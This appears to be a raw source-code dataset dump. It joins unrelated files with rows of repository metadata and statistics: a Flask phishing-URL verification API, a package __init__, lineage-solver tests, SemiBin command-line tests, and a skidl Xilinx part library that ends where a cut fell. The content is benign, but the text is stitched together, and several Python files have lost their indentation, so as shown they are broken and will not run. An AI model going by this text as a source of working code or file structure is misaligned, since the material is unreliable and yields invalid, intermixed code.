] | 1 | 2021-03-31T19:56:26.000Z | 2021-03-31T19:56:26.000Z | antiphishme/src/api/verification.py | TheArqsz/AntiPhishMe-backend | 3ae38059e410152ae1976815c209829ac08f47a5 | [
"MIT"
] | 2 | 2020-05-28T16:45:45.000Z | 2021-09-07T14:16:44.000Z | import json
import jsonschema
from flask import Response
from antiphishme.src.schemas.verify_schema import *
from antiphishme.src.phishing.url_verifier import *
from antiphishme.src.helpers.phishing_levels import PhishLevel
from antiphishme.src.helpers.url_helper import url_to_domain
from werkzeug.exceptions import BadRequest
def verify_by_all(url_body):
try:
jsonschema.validate(url_body, verify_url_schema)
except jsonschema.exceptions.ValidationError as exc:
raise BadRequest(exc.message)
verdict = verify_all(url_body.get('url'))
response_text = {
"status": f"{verdict}"
}
return Response(json.dumps(response_text), 200, mimetype="application/json")
def verify_by_cert_hole(url_body):
try:
jsonschema.validate(url_body, verify_url_schema)
except jsonschema.exceptions.ValidationError as exc:
raise BadRequest(exc.message)
domain = url_to_domain(url_body.get('url'))
if verify_cert_hole(domain):
verdict = PhishLevel.MALICIOUS.get('status')
else:
verdict = PhishLevel.GOOD.get('status')
response_text = {
"status": f"{verdict}"
}
return Response(json.dumps(response_text), 200, mimetype="application/json")
def verify_by_levenstein(url_body):
try:
jsonschema.validate(url_body, verify_url_schema)
except jsonschema.exceptions.ValidationError as exc:
raise BadRequest(exc.message)
domain = url_to_domain(url_body.get('url'))
if verify_levenstein(domain):
verdict = PhishLevel.MALICIOUS.get('status')
else:
verdict = PhishLevel.GOOD.get('status')
response_text = {
"status": verdict
}
return Response(json.dumps(response_text), 200, mimetype="application/json")
def verify_by_entropy(url_body):
try:
jsonschema.validate(url_body, verify_url_schema)
except jsonschema.exceptions.ValidationError as exc:
raise BadRequest(exc.message)
if verify_entropy(url_body.get('url')):
verdict = PhishLevel.MALICIOUS.get('status')
else:
verdict = PhishLevel.GOOD.get('status')
response_text = {
"status": verdict
}
return Response(json.dumps(response_text), 200, mimetype="application/json")
def verify_by_whois(url_body):
try:
jsonschema.validate(url_body, verify_url_schema)
except jsonschema.exceptions.ValidationError as exc:
raise BadRequest(exc.message)
domain = url_to_domain(url_body.get('url'))
if verify_whois(domain):
verdict = PhishLevel.MALICIOUS.get('status')
else:
verdict = PhishLevel.GOOD.get('status')
response_text = {
"status": verdict
}
return Response(json.dumps(response_text), 200, mimetype="application/json")
def verify_by_sfbrowsing(url_body):
try:
jsonschema.validate(url_body, verify_url_schema)
except jsonschema.exceptions.ValidationError as exc:
raise BadRequest(exc.message)
if verify_safebrowsing(url_body.get('url')):
verdict = PhishLevel.MALICIOUS.get('status')
else:
verdict = PhishLevel.GOOD.get('status')
response_text = {
"status": verdict
}
return Response(json.dumps(response_text), 200, mimetype="application/json")
def verify_by_urlscan(url_body):
try:
jsonschema.validate(url_body, verify_url_schema)
except jsonschema.exceptions.ValidationError as exc:
raise BadRequest(exc.message)
verify, _ = verify_urlscan(url_body.get('url'), passive=False, urlscan_wait_time=60)
if verify:
verdict = PhishLevel.MALICIOUS.get('status')
else:
verdict = PhishLevel.GOOD.get('status')
response_text = {
"status": verdict
}
return Response(json.dumps(response_text), 200, mimetype="application/json")
def verify_by_crt(url_body):
try:
jsonschema.validate(url_body, verify_url_schema)
except jsonschema.exceptions.ValidationError as exc:
raise BadRequest(exc.message)
domain = url_to_domain(url_body.get('url'))
if verify_certsh(domain):
verdict = PhishLevel.MALICIOUS.get('status')
else:
verdict = PhishLevel.GOOD.get('status')
response_text = {
"status": verdict
}
return Response(json.dumps(response_text), 200, mimetype="application/json")
def verify_by_keywords(url_body):
try:
jsonschema.validate(url_body, verify_url_schema)
except jsonschema.exceptions.ValidationError as exc:
raise BadRequest(exc.message)
domain = url_to_domain(url_body.get('url'))
verify = verify_keyword_match(domain)
if verify:
verdict = PhishLevel.MALICIOUS.get('status')
else:
verdict = PhishLevel.GOOD.get('status')
response_text = {
"status": verdict
}
return Response(json.dumps(response_text), 200, mimetype="application/json")
| 29.646707 | 88 | 0.68673 | 578 | 4,951 | 5.688581 | 0.115917 | 0.057482 | 0.030109 | 0.054745 | 0.842153 | 0.842153 | 0.842153 | 0.842153 | 0.842153 | 0.842153 | 0 | 0.007406 | 0.209049 | 4,951 | 167 | 89 | 29.646707 | 0.832227 | 0 | 0 | 0.728682 | 0 | 0 | 0.068457 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069767 | false | 0.007752 | 0.062016 | 0 | 0.20155 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
550642bae286b2c0400b4945e0ced98bc64fd4a8 | 140 | py | Python | hipster_api/fields/__init__.py | pomidoroshev/hipster_api | 94fa3cab7c49f0357cd8950f829ace239b93ad5a | [
"MIT"
] | null | null | null | hipster_api/fields/__init__.py | pomidoroshev/hipster_api | 94fa3cab7c49f0357cd8950f829ace239b93ad5a | [
"MIT"
] | null | null | null | hipster_api/fields/__init__.py | pomidoroshev/hipster_api | 94fa3cab7c49f0357cd8950f829ace239b93ad5a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from hipster_api.fields.str import *
from hipster_api.fields.number import *
from hipster_api.fields.mixed import *
| 28 | 39 | 0.75 | 21 | 140 | 4.857143 | 0.52381 | 0.323529 | 0.411765 | 0.588235 | 0.509804 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00813 | 0.121429 | 140 | 4 | 40 | 35 | 0.821138 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
550e56c1178a424d6d70f77d59cb7cf156c132db | 6,291 | py | Python | test/test_reconstruction.py | pjb7687/Cassiopeia | fd3323802995e3becceb8dbefd9555b800e7c61b | [
"MIT"
] | null | null | null | test/test_reconstruction.py | pjb7687/Cassiopeia | fd3323802995e3becceb8dbefd9555b800e7c61b | [
"MIT"
] | null | null | null | test/test_reconstruction.py | pjb7687/Cassiopeia | fd3323802995e3becceb8dbefd9555b800e7c61b | [
"MIT"
] | null | null | null | import networkx as nx
from Cassiopeia.TreeSolver import Node
import Cassiopeia.TreeSolver.lineage_solver as ls
import Cassiopeia.TreeSolver.simulation_tools.simulation_utils as sim_utils
import Cassiopeia as sclt
from pathlib import Path
import pickle as pic
SCLT_PATH = Path(sclt.__path__[0])
import os
import sys
stdout_backup = "testlog"
def test_greedy_simple():
n1 = Node('a', [1,0,0,0,0])
n2 = Node('b', [1,0,0,1,0])
n3 = Node('c', [1,0,0,2,0])
n4 = Node('d', [1,2,0,1,0])
n5 = Node('e', [1,1,0,1,0])
n6 = Node('f', [1,0,3,2,0])
n7 = Node('g', [0,0,0,0,1])
n8 = Node('h', [0,1,0,0,1])
n9 = Node('i', [0,1,2,0,1])
n10 = Node('j', [0,1,1,0,1])
nodes = [n1, n2, n3, n4, n5, n6, n7, n8, n9, n10]
tree = ls.solve_lineage_instance(nodes, method="greedy")
net = tree.get_network()
roots = [n for n in net if net.in_degree(n) == 0]
assert len(roots) == 1
root = roots[0]
targets = [n for n in net if n.is_target]
assert len(targets) == len(nodes)
for t in targets:
assert nx.has_path(net, root, t)
def test_hybrid_simple():
n1 = Node('a', [1,0,0,0,0])
n2 = Node('b', [1,0,0,1,0])
n3 = Node('c', [1,0,0,2,0])
n4 = Node('d', [1,2,0,1,0])
n5 = Node('e', [1,1,0,1,0])
n6 = Node('f', [1,0,3,2,0])
n7 = Node('g', [0,0,0,0,1])
n8 = Node('h', [0,1,0,0,1])
n9 = Node('i', [0,1,2,0,1])
n10 = Node('j', [0,1,1,0,1])
nodes = [n1, n2, n3, n4, n5, n6, n7, n8, n9, n10]
with open(stdout_backup, "w") as f:
sys.stdout = f
tree = ls.solve_lineage_instance(nodes, method="hybrid", hybrid_subset_cutoff=3)
os.remove(stdout_backup)
net = tree.get_network()
roots = [n for n in net if net.in_degree(n) == 0]
assert len(roots) == 1
root = roots[0]
targets = [n for n in net if n.is_target]
assert len(targets) == len(nodes)
for t in targets:
assert nx.has_path(net, root, t)
def test_ilp_simple():
n1 = Node('a', [1,0,0,0,0])
n2 = Node('b', [1,0,0,1,0])
n3 = Node('c', [1,0,0,2,0])
n4 = Node('d', [1,2,0,1,0])
n5 = Node('e', [1,1,0,1,0])
n6 = Node('f', [1,0,3,2,0])
n7 = Node('g', [0,0,0,0,1])
n8 = Node('h', [0,1,0,0,1])
n9 = Node('i', [0,1,2,0,1])
n10 = Node('j', [0,1,1,0,1])
nodes = [n1, n2, n3, n4, n5, n6, n7, n8, n9, n10]
with open(stdout_backup, "w") as f:
sys.stdout = f
tree = ls.solve_lineage_instance(nodes, method="ilp")
os.remove(stdout_backup)
net = tree.get_network()
roots = [n for n in net if net.in_degree(n) == 0]
assert len(roots) == 1
root = roots[0]
targets = [n for n in net if n.is_target]
assert len(targets) == len(nodes)
for t in targets:
assert nx.has_path(net, root, t)
def test_greedy_parallel_evo():
n = Node('a', [1,1,2,0])
n2 = Node('b', [1,1,3,0])
n3 = Node('c', [2,1,1,0])
n4 = Node('d', [2,1,3,0])
n5 = Node('e', [1,3,1,'-'])
n6 = Node('f', [1, '-', '-', '1'])
n7 = Node('g', [1,1,0, 2])
nodes = [n, n2, n3, n4, n5,n6, n7]
tree = ls.solve_lineage_instance(nodes, method='greedy')
net = tree.get_network()
roots = [n for n in net if net.in_degree(n) == 0]
assert len(roots) == 1
root = roots[0]
targets = [n for n in net if n.is_target]
assert len(targets) == len(nodes)
for t in targets:
assert nx.has_path(net, root, t)
multi_parents = [n for n in net if net.in_degree(n) > 1]
assert len(multi_parents) == 0
def test_hybrid_parallel_evo():
n = Node('a', [1,1,2,0])
n2 = Node('b', [1,1,3,0])
n3 = Node('c', [2,1,1,0])
n4 = Node('d', [2,1,3,0])
n5 = Node('e', [1,3,1,'-'])
n6 = Node('f', [1, '-', '-', '1'])
n7 = Node('g', [1,1,0, 2])
nodes = [n, n2, n3, n4, n5,n6, n7]
with open(stdout_backup, "w") as f:
sys.stdout = f
tree = ls.solve_lineage_instance(nodes, method='hybrid', hybrid_subset_cutoff=2)
os.remove(stdout_backup)
net = tree.get_network()
roots = [n for n in net if net.in_degree(n) == 0]
assert len(roots) == 1
root = roots[0]
targets = [n for n in net if n.is_target]
assert len(targets) == len(nodes)
for t in targets:
assert nx.has_path(net, root, t)
multi_parents = [n for n in net if net.in_degree(n) > 1]
assert len(multi_parents) == 0
def test_ilp_parallel_evo():
n = Node('a', [1,1,2,0])
n2 = Node('b', [1,1,3,0])
n3 = Node('c', [2,1,1,0])
n4 = Node('d', [2,1,3,0])
n5 = Node('e', [1,3,1,'-'])
n6 = Node('f', [1, '-', '-', '1'])
n7 = Node('g', [1,1,0, 2])
nodes = [n, n2, n3, n4, n5,n6, n7]
with open(stdout_backup, "w") as f:
sys.stdout = f
tree = ls.solve_lineage_instance(nodes, method='ilp')
os.remove(stdout_backup)
net = tree.get_network()
roots = [n for n in net if net.in_degree(n) == 0]
assert len(roots) == 1
root = roots[0]
targets = [n for n in net if n.is_target]
assert len(targets) == len(nodes)
for t in targets:
assert nx.has_path(net, root, t)
multi_parents = [n for n in net if net.in_degree(n) > 1]
assert len(multi_parents) == 0
def test_on_sim_greedy():
stree = pic.load(open("test/data/sim_net.pkl", "rb"))
leaves = stree.get_leaves()
target_nodes = []
for l in leaves:
new_node = Node(l.name, l.get_character_vec())
target_nodes.append(new_node)
rtree = ls.solve_lineage_instance(target_nodes, method="greedy")
rnet = rtree.get_network()
roots = [n for n in rnet if rnet.in_degree(n) == 0]
assert len(roots) == 1
root =roots[0]
targets = [n for n in rnet if n.is_target]
assert len(targets) == len(target_nodes)
for t in targets:
assert nx.has_path(rnet, root, t)
multi_parents = [n for n in rnet if rnet.in_degree(n) > 1]
assert len(multi_parents) == 0
def test_on_sim_hybrid():
stree = pic.load(open("test/data/sim_net.pkl", "rb"))
leaves = stree.get_leaves()
target_nodes = []
for l in leaves:
new_node = Node(l.name, l.get_character_vec())
target_nodes.append(new_node)
with open(stdout_backup, "w") as f:
sys.stdout = f
rtree = ls.solve_lineage_instance(target_nodes, method="hybrid", hybrid_subset_cutoff=200, time_limit=100, max_neighborhood_size=500, threads=4)
os.remove(stdout_backup)
rnet = rtree.get_network()
roots = [n for n in rnet if rnet.in_degree(n) == 0]
assert len(roots) == 1
root = roots[0]
targets = [n for n in rnet if n.is_target]
assert len(targets) == len(target_nodes)
for t in targets:
assert nx.has_path(rnet, root, t)
multi_parents = [n for n in rnet if rnet.in_degree(n) > 1]
assert len(multi_parents) == 0
| 21.996503 | 146 | 0.616436 | 1,232 | 6,291 | 3.039773 | 0.090909 | 0.019226 | 0.028037 | 0.039252 | 0.893191 | 0.893191 | 0.886782 | 0.886782 | 0.863284 | 0.863284 | 0 | 0.072819 | 0.183596 | 6,291 | 285 | 147 | 22.073684 | 0.656347 | 0 | 0 | 0.854054 | 0 | 0 | 0.025914 | 0.006677 | 0 | 0 | 0 | 0 | 0.156757 | 1 | 0.043243 | false | 0 | 0.048649 | 0 | 0.091892 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
55103fb3b977f813454f08e7de7cb487d622902f | 1,768 | py | Python | test/test_generate_data_coassembly_command.py | psj1997/SemiBin | dd255cb336a7ff1d586ec57764ba96811a0042be | [
"MIT"
] | null | null | null | test/test_generate_data_coassembly_command.py | psj1997/SemiBin | dd255cb336a7ff1d586ec57764ba96811a0042be | [
"MIT"
] | null | null | null | test/test_generate_data_coassembly_command.py | psj1997/SemiBin | dd255cb336a7ff1d586ec57764ba96811a0042be | [
"MIT"
] | 1 | 2021-03-01T04:41:17.000Z | 2021-03-01T04:41:17.000Z | import os
import pandas as pd
### Input fa
os.system('SemiBin generate_data_single -i test/coassembly_sample_data/input.fasta -o output_coassembly_fa -m 2500 --ratio 0.05 --ml-threshold 4000 -p 1 -b test/coassembly_sample_data/input.sorted*.bam')
data = pd.read_csv('output_coassembly_fa/data.csv', index_col=0)
data_split = pd.read_csv('output_coassembly_fa/data_split.csv', index_col=0)
assert data.shape == (40, 141)
assert data_split.shape == (80, 141)
### Input .gz
os.system('SemiBin generate_data_single -i test/coassembly_sample_data/input.fasta.gz -o output_coassembly_gz -m 2500 --ratio 0.05 --ml-threshold 4000 -p 1 -b test/coassembly_sample_data/input.sorted*.bam')
data = pd.read_csv('output_coassembly_gz/data.csv', index_col=0)
data_split = pd.read_csv('output_coassembly_gz/data_split.csv', index_col=0)
assert data.shape == (40, 141)
assert data_split.shape == (80, 141)
### Input .bz2
os.system('SemiBin generate_data_single -i test/coassembly_sample_data/input.fasta.bz2 -o output_coassembly_bz2 -m 2500 --ratio 0.05 --ml-threshold 4000 -p 1 -b test/coassembly_sample_data/input.sorted*.bam')
data = pd.read_csv('output_coassembly_bz2/data.csv', index_col=0)
data_split = pd.read_csv('output_coassembly_bz2/data_split.csv', index_col=0)
assert data.shape == (40, 141)
assert data_split.shape == (80, 141)
### Input .xz
os.system('SemiBin generate_data_single -i test/coassembly_sample_data/input.fasta.xz -o output_coassembly_xz -m 2500 --ratio 0.05 --ml-threshold 4000 -p 1 -b test/coassembly_sample_data/input.sorted*.bam')
data = pd.read_csv('output_coassembly_xz/data.csv', index_col=0)
data_split = pd.read_csv('output_coassembly_xz/data_split.csv', index_col=0)
assert data.shape == (40, 141)
assert data_split.shape == (80, 141) | 44.2 | 208 | 0.768665 | 305 | 1,768 | 4.206557 | 0.147541 | 0.149649 | 0.124708 | 0.149649 | 0.90491 | 0.90491 | 0.90491 | 0.890881 | 0.890881 | 0.890881 | 0 | 0.063086 | 0.094457 | 1,768 | 40 | 209 | 44.2 | 0.738289 | 0.022059 | 0 | 0.363636 | 1 | 0.181818 | 0.599301 | 0.364007 | 0 | 0 | 0 | 0 | 0.363636 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fd469221d54629f7b393b7a913045220663d17e6 | 183,562 | py | Python | skidl/libs/xilinx_sklib.py | arjenroodselaar/skidl | 0bf801bd3b74e6ef94bd9aa1b68eef756b568276 | [
"MIT"
] | 700 | 2016-08-16T21:12:50.000Z | 2021-10-10T02:15:18.000Z | skidl/libs/xilinx_sklib.py | 0dvictor/skidl | 458709a10b28a864d25ae2c2b44c6103d4ddb291 | [
"MIT"
] | 118 | 2016-08-16T20:51:05.000Z | 2021-10-10T08:07:18.000Z | skidl/libs/xilinx_sklib.py | 0dvictor/skidl | 458709a10b28a864d25ae2c2b44c6103d4ddb291 | [
"MIT"
] | 94 | 2016-08-25T14:02:28.000Z | 2021-09-12T05:17:08.000Z | from skidl import SKIDL, TEMPLATE, Part, Pin, SchLib
SKIDL_lib_version = '0.0.1'
xilinx = SchLib(tool=SKIDL).add_parts(*[
Part(name='4003APG120',dest=TEMPLATE,tool=SKIDL,do_erc=True,aliases=['4003PG120']),
Part(name='4003HPQ208',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='4005HMQ240',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='4013PQ240',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC1736APD8',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC18V01SO20',dest=TEMPLATE,tool=SKIDL,ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='D0',func=Pin.OUTPUT,do_erc=True),
Pin(num='2',name='D2',func=Pin.OUTPUT,do_erc=True),
Pin(num='3',name='CLK',do_erc=True),
Pin(num='4',name='TDI',do_erc=True),
Pin(num='5',name='TMS',do_erc=True),
Pin(num='6',name='TCK',do_erc=True),
Pin(num='7',name='D4/CF',func=Pin.OPENCOLL,do_erc=True),
Pin(num='8',name='OE/RESET',do_erc=True),
Pin(num='9',name='D6',func=Pin.OUTPUT,do_erc=True),
Pin(num='10',name='CE',do_erc=True),
Pin(num='20',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='D7',func=Pin.OUTPUT,do_erc=True),
Pin(num='13',name='CEO',func=Pin.OUTPUT,do_erc=True),
Pin(num='14',name='D5',func=Pin.OUTPUT,do_erc=True),
Pin(num='15',name='D3',func=Pin.OUTPUT,do_erc=True),
Pin(num='16',name='D1',func=Pin.OUTPUT,do_erc=True),
Pin(num='17',name='TDO',func=Pin.OPENCOLL,do_erc=True),
Pin(num='18',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='VCCO',func=Pin.PWRIN,do_erc=True)]),
Part(name='XC2018-PC68',dest=TEMPLATE,tool=SKIDL,do_erc=True,aliases=['XC2064-PC68']),
Part(name='XC2018-PC84',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC2C256-TQ144',dest=TEMPLATE,tool=SKIDL,keywords='CPLD',description='CoolRunner-II CPLD, 256 macrocells',ref_prefix='U',num_units=1,fplist=['TQFP*20x20mm*Pitch0.5mm*'],do_erc=True,pins=[
Pin(num='1',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='GTS2',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='GTS3',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='P4',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='GTS0',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='GTS1',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='P7',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='9',name='P9',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='P10',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='P20',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='GCK0',func=Pin.BIDIR,do_erc=True),
Pin(num='40',name='P40',func=Pin.BIDIR,do_erc=True),
Pin(num='50',name='P50',func=Pin.BIDIR,do_erc=True),
Pin(num='60',name='P60',func=Pin.BIDIR,do_erc=True),
Pin(num='70',name='P70',func=Pin.BIDIR,do_erc=True),
Pin(num='80',name='P80',func=Pin.BIDIR,do_erc=True),
Pin(num='90',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='P11',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='P21',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='P31',func=Pin.BIDIR,do_erc=True),
Pin(num='41',name='P41',func=Pin.BIDIR,do_erc=True),
Pin(num='51',name='P51',func=Pin.BIDIR,do_erc=True),
Pin(num='61',name='P61',func=Pin.BIDIR,do_erc=True),
Pin(num='71',name='P71',func=Pin.BIDIR,do_erc=True),
Pin(num='81',name='P81',func=Pin.BIDIR,do_erc=True),
Pin(num='91',name='P91',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='P12',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='P22',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='GCK1',func=Pin.BIDIR,do_erc=True),
Pin(num='42',name='P42',func=Pin.BIDIR,do_erc=True),
Pin(num='52',name='P52',func=Pin.BIDIR,do_erc=True),
Pin(num='62',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='72',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='82',name='P82',func=Pin.BIDIR,do_erc=True),
Pin(num='92',name='P92',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='P13',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='P23',func=Pin.BIDIR,do_erc=True),
Pin(num='33',name='P33',func=Pin.BIDIR,do_erc=True),
Pin(num='43',name='P43',func=Pin.BIDIR,do_erc=True),
Pin(num='53',name='P53',func=Pin.BIDIR,do_erc=True),
Pin(num='63',name='TDI',func=Pin.BIDIR,do_erc=True),
Pin(num='73',name='VCCIO1',func=Pin.PWRIN,do_erc=True),
Pin(num='83',name='P83',func=Pin.BIDIR,do_erc=True),
Pin(num='93',name='VCCIO1',func=Pin.PWRIN,do_erc=True),
Pin(num='14',name='P14',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='P24',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='P34',func=Pin.BIDIR,do_erc=True),
Pin(num='44',name='P44',func=Pin.BIDIR,do_erc=True),
Pin(num='54',name='P54',func=Pin.BIDIR,do_erc=True),
Pin(num='64',name='P64',func=Pin.BIDIR,do_erc=True),
Pin(num='74',name='P74',func=Pin.BIDIR,do_erc=True),
Pin(num='84',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='94',name='P94',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='P15',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='P25',func=Pin.BIDIR,do_erc=True),
Pin(num='35',name='CDRST',func=Pin.BIDIR,do_erc=True),
Pin(num='45',name='P45',func=Pin.BIDIR,do_erc=True),
Pin(num='55',name='VCCIO1',func=Pin.PWRIN,do_erc=True),
Pin(num='65',name='TMS',func=Pin.BIDIR,do_erc=True),
Pin(num='75',name='P75',func=Pin.BIDIR,do_erc=True),
Pin(num='85',name='P85',func=Pin.BIDIR,do_erc=True),
Pin(num='95',name='P95',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='P16',func=Pin.BIDIR,do_erc=True),
Pin(num='26',name='P26',func=Pin.BIDIR,do_erc=True),
Pin(num='36',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='46',name='P46',func=Pin.BIDIR,do_erc=True),
Pin(num='56',name='P56',func=Pin.BIDIR,do_erc=True),
Pin(num='66',name='P66',func=Pin.BIDIR,do_erc=True),
Pin(num='76',name='P76',func=Pin.BIDIR,do_erc=True),
Pin(num='86',name='P86',func=Pin.BIDIR,do_erc=True),
Pin(num='96',name='P96',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='P17',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='VCCIO1',func=Pin.PWRIN,do_erc=True),
Pin(num='37',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='47',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='57',name='P57',func=Pin.BIDIR,do_erc=True),
Pin(num='67',name='TCK',func=Pin.BIDIR,do_erc=True),
Pin(num='77',name='P77',func=Pin.BIDIR,do_erc=True),
Pin(num='87',name='P87',func=Pin.BIDIR,do_erc=True),
Pin(num='97',name='P97',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='P18',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='P28',func=Pin.BIDIR,do_erc=True),
Pin(num='38',name='GCK2',func=Pin.BIDIR,do_erc=True),
Pin(num='48',name='P48',func=Pin.BIDIR,do_erc=True),
Pin(num='58',name='P58',func=Pin.BIDIR,do_erc=True),
Pin(num='68',name='P68',func=Pin.BIDIR,do_erc=True),
Pin(num='78',name='P78',func=Pin.BIDIR,do_erc=True),
Pin(num='88',name='P88',func=Pin.BIDIR,do_erc=True),
Pin(num='98',name='P98',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='P19',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='39',name='DGE',func=Pin.BIDIR,do_erc=True),
Pin(num='49',name='P49',func=Pin.BIDIR,do_erc=True),
Pin(num='59',name='P59',func=Pin.BIDIR,do_erc=True),
Pin(num='69',name='P69',func=Pin.BIDIR,do_erc=True),
Pin(num='79',name='P79',func=Pin.BIDIR,do_erc=True),
Pin(num='89',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='99',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='100',name='P100',func=Pin.BIDIR,do_erc=True),
Pin(num='110',name='P110',func=Pin.BIDIR,do_erc=True),
Pin(num='120',name='P120',func=Pin.BIDIR,do_erc=True),
Pin(num='130',name='P130',func=Pin.BIDIR,do_erc=True),
Pin(num='140',name='P140',func=Pin.BIDIR,do_erc=True),
Pin(num='101',name='P101',func=Pin.BIDIR,do_erc=True),
Pin(num='111',name='P111',func=Pin.BIDIR,do_erc=True),
Pin(num='121',name='P121',func=Pin.BIDIR,do_erc=True),
Pin(num='131',name='P131',func=Pin.BIDIR,do_erc=True),
Pin(num='141',name='VCCIO2',func=Pin.PWRIN,do_erc=True),
Pin(num='102',name='P102',func=Pin.BIDIR,do_erc=True),
Pin(num='112',name='P112',func=Pin.BIDIR,do_erc=True),
Pin(num='122',name='TDO',func=Pin.BIDIR,do_erc=True),
Pin(num='132',name='P132',func=Pin.BIDIR,do_erc=True),
Pin(num='142',name='P142',func=Pin.BIDIR,do_erc=True),
Pin(num='103',name='P103',func=Pin.BIDIR,do_erc=True),
Pin(num='113',name='P113',func=Pin.BIDIR,do_erc=True),
Pin(num='123',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='133',name='P133',func=Pin.BIDIR,do_erc=True),
Pin(num='143',name='GSR',func=Pin.BIDIR,do_erc=True),
Pin(num='104',name='P104',func=Pin.BIDIR,do_erc=True),
Pin(num='114',name='P114',func=Pin.BIDIR,do_erc=True),
Pin(num='124',name='P124',func=Pin.BIDIR,do_erc=True),
Pin(num='134',name='P134',func=Pin.BIDIR,do_erc=True),
Pin(num='144',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='105',name='P105',func=Pin.BIDIR,do_erc=True),
Pin(num='115',name='P115',func=Pin.BIDIR,do_erc=True),
Pin(num='125',name='P125',func=Pin.BIDIR,do_erc=True),
Pin(num='135',name='P135',func=Pin.BIDIR,do_erc=True),
Pin(num='106',name='P106',func=Pin.BIDIR,do_erc=True),
Pin(num='116',name='P116',func=Pin.BIDIR,do_erc=True),
Pin(num='126',name='P126',func=Pin.BIDIR,do_erc=True),
Pin(num='136',name='P136',func=Pin.BIDIR,do_erc=True),
Pin(num='107',name='P107',func=Pin.BIDIR,do_erc=True),
Pin(num='117',name='P117',func=Pin.BIDIR,do_erc=True),
Pin(num='127',name='VCCIO2',func=Pin.PWRIN,do_erc=True),
Pin(num='137',name='P137',func=Pin.BIDIR,do_erc=True),
Pin(num='108',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='118',name='P118',func=Pin.BIDIR,do_erc=True),
Pin(num='128',name='P128',func=Pin.BIDIR,do_erc=True),
Pin(num='138',name='P138',func=Pin.BIDIR,do_erc=True),
Pin(num='109',name='VCCIO2',func=Pin.PWRIN,do_erc=True),
Pin(num='119',name='P119',func=Pin.BIDIR,do_erc=True),
Pin(num='129',name='P129',func=Pin.BIDIR,do_erc=True),
Pin(num='139',name='P139',func=Pin.BIDIR,do_erc=True)]),
